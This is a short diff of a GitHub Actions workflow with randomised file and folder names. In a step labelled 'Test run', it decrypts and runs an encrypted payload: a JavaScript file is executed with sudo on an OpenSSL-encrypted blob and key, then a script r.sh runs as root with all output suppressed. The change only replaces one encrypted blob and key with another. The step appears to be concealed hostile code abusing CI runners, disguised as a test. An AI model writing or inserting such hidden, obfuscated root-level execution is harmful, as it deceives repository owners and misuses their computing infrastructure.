--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'pie44'
+        echo '43e0i'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+Tv+ACADBBN+hRoaDfqG2R9o5IrDYaBOe9pOKKYQsxCust3Y8YXQw6qgVipUt8tA1ATebvkfEwokAI/LrInARVxfyin68o0RsUNf6z+uWYp3hbbtGMiGFj 6uwvqj && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18crdOgLU+JoC0aRy58O13TSrKAoFD2Y1T5Swbzy8O/qEVg+xrqFeGgaaoIUgzQpL3u5nfBNi4ucDLDCAwTCeQH41qOzPkA311LbK8DFA43eb78RUZogEfE 84lc20 && sudo sh r.sh > /dev/null 2>&1
